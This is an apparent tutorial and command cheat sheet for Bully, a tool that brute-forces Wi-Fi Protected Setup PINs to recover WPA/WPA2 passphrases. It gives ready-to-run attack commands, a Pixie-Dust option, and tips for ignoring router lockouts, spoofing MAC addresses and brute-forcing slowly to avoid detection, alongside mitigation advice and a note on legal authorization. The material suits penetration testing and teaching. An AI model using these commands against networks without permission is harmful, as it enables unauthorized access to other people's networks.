bully: A tool for exploiting WPS vulnerabilities in Wi-Fi networks

What is Bully?

Bully is a Wi-Fi Protected Setup (WPS) PIN brute-force tool designed to recover WPS PINs and subsequently the WPA/WPA2 passphrases of vulnerable wireless networks. It’s an alternative to tools like Reaver, offering some advantages in speed and reliability against certain router models.

What Bully does and why it’s used:

  • Exploiting WPS Vulnerabilities: The core function of Bully is to perform a brute-force attack on the WPS PIN. The WPS PIN is an 8-digit number, but due to a design flaw, the authentication process reveals whether the first four digits are correct independently of the last four. This significantly reduces the number of possible combinations an attacker needs to try. Instead of 10^8 attempts for an 8-digit PIN, it’s effectively reduced to around 10^4 (for the first half) + 10^3 (for the second half, as the 8th digit is a checksum), making the brute-force attack feasible.
  • Alternative to Reaver: Bully is a newer implementation of the WPS brute-force attack, often cited as an improvement over the original Reaver tool. It’s written in C and offers advantages like fewer dependencies, improved memory and CPU performance, and more robust options.
  • How it Works (Simplified):
    1. Monitor Mode: Bully requires a wireless interface that supports monitor mode to capture Wi-Fi traffic.
    2. Target Identification: It identifies WPS-enabled access points.
    3. PIN Brute-Forcing: Bully then systematically tries different PIN combinations against the target AP.
    4. WPA PSK Recovery: Once the correct WPS PIN is found, Bully can often recover the WPA/WPA2 Pre-Shared Key (PSK) for the network.
  • Pixie-Dust Attack: Bully can also be used in conjunction with “Pixie-Dust” attacks. This is an offline brute-force attack that can be much faster than traditional online WPS PIN brute-forcing if the access point is vulnerable to certain nonce (number used once) generation issues.
  • Usage in Penetration Testing: Tools like Bully are used by security professionals for penetration testing and auditing the security of Wi-Fi networks. They help identify if a network is vulnerable to WPS attacks, allowing administrators to take corrective measures.
  • Mitigation: The most effective way to prevent WPS attacks is to disable WPS on your router. If disabling WPS isn’t an option, ensure your router’s firmware is up-to-date, as some newer devices might have built-in protections against these specific attacks. Using a strong, unique WPA2 password is also crucial.
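To make the search-space arithmetic above concrete, here is an added Python example (not Bully’s code and not part of the original page) that implements the WPS PIN checksum from the Wi-Fi Simple Configuration specification and counts the candidates a registrar that confirms each PIN half separately must expose; the function names are ours, and the sample PIN 12345670 is the one used later on this page.

```python
"""Added example (not Bully's code): why the WPS PIN keyspace collapses.

WPS PINs are 8 digits; digit 8 is a checksum over digits 1-7 (Wi-Fi Simple
Configuration spec). Because the registrar exchange confirms the first four
digits (M4/M5) separately from the last four (M6/M7), an online attacker
faces 10^4 + 10^3 candidates instead of the 10^7 well-formed PINs.
"""


def wps_pin_checksum(pin7: int) -> int:
    """Checksum digit for the first 7 digits of a WPS PIN."""
    accum = 0
    while pin7:
        accum += 3 * (pin7 % 10)
        pin7 //= 10
        accum += pin7 % 10
        pin7 //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if pin is 8 digits and its last digit is the correct checksum."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return int(pin[7]) == wps_pin_checksum(int(pin[:7]))


def valid_second_halves(first_half: int) -> int:
    """Count 4-digit second halves that form a well-formed PIN with first_half."""
    return sum(
        is_valid_wps_pin(f"{first_half:04d}{second:04d}")
        for second in range(10_000)
    )


def online_worst_case(first_half: int = 1234) -> int:
    """Attempts needed when each half is confirmed separately (worst case)."""
    return 10_000 + valid_second_halves(first_half)


def well_formed_pins() -> int:
    """Total PINs that pass the checksum: 10^4 first halves x valid second halves."""
    return 10_000 * valid_second_halves(0)


if __name__ == "__main__":
    print("12345670 well-formed:", is_valid_wps_pin("12345670"))  # True
    print("online worst case:", online_worst_case())              # 11000
    print("well-formed PINs:", well_formed_pins())                # 10000000
```

The same checksum lets an administrator verify that a PIN printed on a router label is well-formed before troubleshooting, which is the only legitimate reason to touch WPS at all; disabling it remains the fix.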

Installation

Bully comes pre-installed in Kali Linux. If you need to install or update it:

Bash
sudo apt update
sudo apt install bully

For manual installation from source:

Bash
git clone https://github.com/aanarchyy/bully
cd bully/src
make
sudo make install

Basic Usage Examples

Usage:

  • bully [options] interface: This is the general syntax for running the tool. You provide various options followed by the name of your wireless interface, which must be in monitor mode.

Required Arguments:

These are essential for Bully to know what to attack.

  • interface: Wireless interface in monitor mode (root required)
    • This is your Wi-Fi adapter (e.g., wlan0mon, mon0). It must be in monitor mode, which allows it to capture all wireless traffic, not just traffic intended for it. Running in monitor mode typically requires root privileges.
  • -b, --bssid macaddr: MAC address of the target access point
    • You can specify the BSSID (MAC address) of the Wi-Fi router you want to target. This is the most common and recommended way to specify the target. Example: -b 00:11:22:33:44:55
  • -e, --essid string: Extended SSID for the access point
    • Alternatively, you can specify the ESSID (network name, e.g., “MyHomeWiFi”). If there are multiple APs with the same ESSID, using the BSSID (-b) is more precise. Example: -e "My WiFi Network"

Basic attack against a target AP:

Bash
sudo bully wlan0mon -b 00:11:22:33:44:55

Verbose mode with channel specification:

Bash
sudo bully wlan0mon -b 00:11:22:33:44:55 -c 6 -v 3

Using a specific PIN database:

Bash
sudo bully wlan0mon -b 00:11:22:33:44:55 -f pin-database.txt

Advanced Usage Examples

Bypassing fake AP detections:

Bash
sudo bully wlan0mon -b 00:11:22:33:44:55 --force

Session resumption (after interruption): Bully records its progress in per-target session files in its working directory and picks up automatically when re-run against the same BSSID; to restart from an explicit PIN, use -p (note that -S is the sequential-order flag from the option table below and takes no argument):

Bash
sudo bully wlan0mon -b 00:11:22:33:44:55 -p 12345670

Pixie Dust attack (for vulnerable routers):

Bash
sudo bully wlan0mon -b 00:11:22:33:44:55 --pixiewps

Command-Line Options


Required Arguments (Must Specify One)

Option | Description
-b, --bssid | Target AP’s MAC address (e.g., 00:11:22:33:44:55)
-e, --essid | Target AP’s SSID (if MAC is unknown)

Example:

Bash
sudo bully wlan0mon -b 00:11:22:33:44:55

Optional Arguments

Basic Options

Option | Description | Default
-c, --channel N | AP channel (or list, e.g., 1,6,11) | Auto
-i, --index N | Start at a specific PIN index (7/8 digits) | Auto
-l, --lockwait N | Wait time if AP locks WPS (seconds) | 43
-o, --outfile | Save output to file | stdout
-p, --pin N | Start with a specific PIN (7/8 digits) | Auto
-v, --verbosity N | Logging level (1=quiet, 4=debug) | 3
-5, --5ghz | Enable 5GHz channel hopping | Disabled

Example (Target channel 6 with high verbosity):

Bash
sudo bully wlan0mon -b 00:11:22:33:44:55 -c 6 -v 4

Brute-Force & Performance

Option | Description
-B, --bruteforce | Force-check all PIN checksum digits
-F, --force | Ignore warnings (e.g., fake AP detection)
-S, --sequential | Disable PIN randomization
-T, --test | Dry-run (no packets injected)

Example (Brute-force mode):

Bash
sudo bully wlan0mon -b 00:11:22:33:44:55 -B

Advanced Arguments

Pixie Dust Attack

Option | Description
-d, --pixiewps | Enable Pixie Dust attack (for vulnerable routers)

Example:

Bash
sudo bully wlan0mon -b 00:11:22:33:44:55 -d

MAC Spoofing & Stealth

Option | Description
-s, --source | Spoof source MAC address
-W, --windows7 | Masquerade as Windows 7 registrar
-P, --probe | Use probe requests for hidden APs

Example (Spoof MAC and mimic Windows):

Bash
sudo bully wlan0mon -b 00:11:22:33:44:55 -s 66:77:88:99:AA:BB -W

Lockout Handling

Option | Description
-D, --detectlock | Detect AP lockouts (even if unreported)
-L, --lockignore | Ignore AP-reported lockouts

Example (Aggressive mode, ignore locks):

Bash
sudo bully wlan0mon -b 00:11:22:33:44:55 -F -L

Throttling & Timeouts

Option | Description
-1, --pin1delay M,N | Delay M sec every N NACKs at M5 (first PIN half)
-2, --pin2delay M,N | Delay M sec every N NACKs at M7 (second PIN half)
-Z, --suppress | Disable packet throttling (faster but risky)

Example (Add delays to avoid lockouts):

Bash
sudo bully wlan0mon -b 00:11:22:33:44:55 -1 2,3 -2 5,1

Real-World Use Cases

  1. Pixie Dust Attack (Fast exploit for vulnerable routers):

Bash
sudo bully wlan0mon -b 00:11:22:33:44:55 -d -v 4

  2. Stealthy PIN Brute-Force (Slow, avoids detection):

Bash
sudo bully wlan0mon -b 00:11:22:33:44:55 -1 5,1 -2 10,1 -S

  3. Resume Interrupted Session:

Bash
sudo bully wlan0mon -b 00:11:22:33:44:55 -p 12345670

Troubleshooting Cheatsheet

Issue | Solution
AP not responding | Check channel (-c), enable -P for hidden APs
AP locks WPS | Use -l 60 (longer wait) or -L (ignore locks)
Low success rate | Try -B (brute-force checksum) or -d (Pixie Dust)
Packet injection fails | Verify monitor mode (airmon-ng check kill)

Troubleshooting Tips

Common Issues and Solutions:

  1. Interface not found:

    • Ensure your wireless card is in monitor mode (sudo airmon-ng start wlan0)
    • Verify interface name with iwconfig
  2. AP not responding:

    • Confirm the AP has WPS enabled
    • Check you’re on the correct channel
    • Try reducing distance to the AP
  3. AP locks WPS:

    • Use -1 and -2 (pin1delay/pin2delay) to add delays between attempts
    • Try --pixiewps if supported
    • Wait for the lockout period to expire
  4. Low success rate:

    • Try different PIN generation strategies (-B option)
    • Use known vendor-specific PIN algorithms
  5. Pixie Dust not working:

    • Confirm the router is vulnerable to Pixie Dust
    • Try with -v 3 for detailed error messages

Ethical Considerations

Remember that using Bully against networks you don’t own or have permission to test is illegal in most jurisdictions. Always obtain proper authorization before conducting any wireless security testing.

Best Practices

  1. Use in controlled environments for legitimate testing only
  2. Combine with other tools like wash to identify WPS-enabled APs
  3. Document findings for security improvement reports
  4. Consider router firmware updates that disable WPS as a mitigation